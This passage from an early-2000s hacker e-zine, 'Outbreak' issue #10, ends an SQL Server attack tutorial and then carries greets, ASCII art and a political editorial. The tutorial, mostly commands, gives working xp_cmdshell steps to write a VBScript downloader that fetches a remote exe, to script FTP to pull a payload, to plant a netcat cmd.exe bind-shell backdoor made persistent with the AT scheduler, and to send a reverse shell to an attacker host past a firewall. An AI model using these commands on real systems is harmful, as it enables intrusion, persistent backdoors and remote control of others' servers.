master..xp_cmdshell 'echo code for our .vbs program >> 0wn3d.vbs' As you can see, the syntax for xp_cmdshell is exec master..xp_cmdshell 'command'. There are plenty of interesting things we could stuff that .vbs with... possibly some code to fetch files off the web? Set xmlHTTP = CreateObject("MSXML2.ServerXMLHTTP") URL= "http://www.domain.com/file.exe" xmlHTTP.open "GET", URL, false xmlHTTP.send() set myStream = CreateObject("ADODB.Stream") myStream.Open myStream.Type = 1 myStream.Write xmlHTTP.ResponseBody myStream.Position = 0 'Set the stream position to the start myXMLfile = "D:\file.zip" set FSO = Createobject("Scripting.FileSystemObject") if fso.Fileexists(myXMLfile) then Fso.DeleteFile myXMLfile set FSO = Nothing myStream.SaveToFile myXMLfile myStream.Close Set myStream = Nothing Or for those who don't know vbscript, you could use the same method to stuff a file with FTP commands and run ftp with the input piped in from that file. You would fill up a file with ftp commands like this: exec master..xp_cmdshell 'echo open 0.0.0.0 21 >> ftp.dat' exec master..xp_cmdshell 'echo username >> ftp.dat' exec master..xp_cmdshell 'echo password >> ftp.dat' exec master..xp_cmdshell 'echo lcd c:\ >> ftp.dat' exec master..xp_cmdshell 'echo binary >> ftp.dat' exec master..xp_cmdshell 'echo get path\file.exe >> ftp.dat' Then finally, you would use the command: exec master..xp_cmdshell 'ftp.exe < ftp.dat' Which would run ftp using all the commands in ftp.dat as its input. We could use this technique to upload netcat to the target server and have it hardlisten to some port acting as a backdoor. we could also execute the AT command from the command line adding our backdoor to the win2k scheduling program (assuming win2k is the platform running and the scheduling service is running. exec master..xp_cmdshell 'nc -L -d -e cmd.exe -p 31337' exec master..xp_cmdshell 'AT 00:00 /every:M "nc -L -d -e cmd.exe -p 31337"' Of course, instead of 31337, you would use a port that you know you can connect to. Wait, what if the firewall is too picky for that? well, we can get around this also. Often a firewall will do a damn good job keeping packets from getting in... but they don't often make to big a deal of letting packets out. We can initiate a connection from inside the firewall like this: exec master..xp_cmdshell 'nc -d -e cmd.exe 0.0.0.0 31337' Replacing 0.0.0.0 with the attackers system, or a system he is in control of and having that system listen on port 31337 (or any port that the firewall will packets flow out through, remember when we used openrowset to mine those types of rules from the firewall? hurrah. You can also use the timeout property of openrowset to turn your target into a portscanner. the possibilities are endless. :) Well, I'm sure theres a few things I'm missing... but I'm on a bit of a tight schedual this week... Kleptics waiting on me. If anyone has any questions feel free to ask me at dropc0de@yahoo.com. ---------------------------------------------------------------------- greets: savvyD, ramb0x, gr3p, kleptic, dirv, jenny, lexi, lenny, turb, joja, smiley, again. And this time i'd like to add Kybo, Count and Forge. :D _______________________________________________________________ |______________________________________________________________ | || || || ___ _ ____ _ || || / _ \ _ _| |_| __ ) _ __ ___ __ _| | _ || || | | | | | | | __| _ \| '__/ _ \/ _` | |/ / || || | |_| | |_| | |_| |_) | | | __/ (_| | < || || \___/ \__,_|\__|____/|_| \___|\__,_|_|\_\ || || || ||_____--------------------------------------------------______|| |_______/-----------------------------------------------\_______| ___ _ _ | __(_)_ _ __ _| | | _|| | ' \/ _` | | __ |_| |_|_||_\__,_|_| \ \ / /__ _ _ __| |___ \ \/\/ / _ \ '_/ _` (_-< \_/\_/\___/_| \__,_/__/ ФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФ PUT THE WORDS IN HERE: Hey everyone! Well, here is issue #10. Hope you all enjoyed it. I usually write about howe you should send us articles. But this Issue I want you to read something written by, Matthew Rothschild. ================ Bush's Obscenity ================ On October 3, Bush uttered one of the grossest obscenities imaginable: "War may be unavoidable." War is almost always avoidable. In the case of Iraq, it is particularly avoidable, since Iraq has not attacked the United States and is in no position to do so. It's only "unavoidable" because Bush so desperately wants to go to war. Bush, not Saddam Hussein, is blocking the U.N. inspectors from going back to work. And Bush and Blair are insisting that U.N. Security Council let the war begin. How Bush could then say, with a straight face, that "we didn't ask for this challenge" is beyond me. Then, pouring it on, he added, "None of us here today desire to see military conflict because we know the awful nature of war." Actually, I doubt Bush has any appreciation of the awful nature of war, and his desire for military conflict against Iraq is on display for all to see. These rhetorical feints are mere calisthenics before the heavy lifting of the bombs, a ritual clearing of the throat before the war whoop. - Outbreak Staff ФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФ ++++++++++++++++++++++++++WATCH THIS SPACE++++++++++++++++++++++ ГФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФГ +-+-+-+-+-+-+-+-+ -АААБББББВВВВВлллллллллВВВББА№-|O|u|t|b|r|e|a|k|№АААБББББВВВВВлллллллллВВВББА- +-+-+-+-+-+-+-+-+ ГФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФФГ Outbreak Contents may not be used with out express written permission By the Editor - kleptic@grex.org COPYRIGHTЉЎ 2002.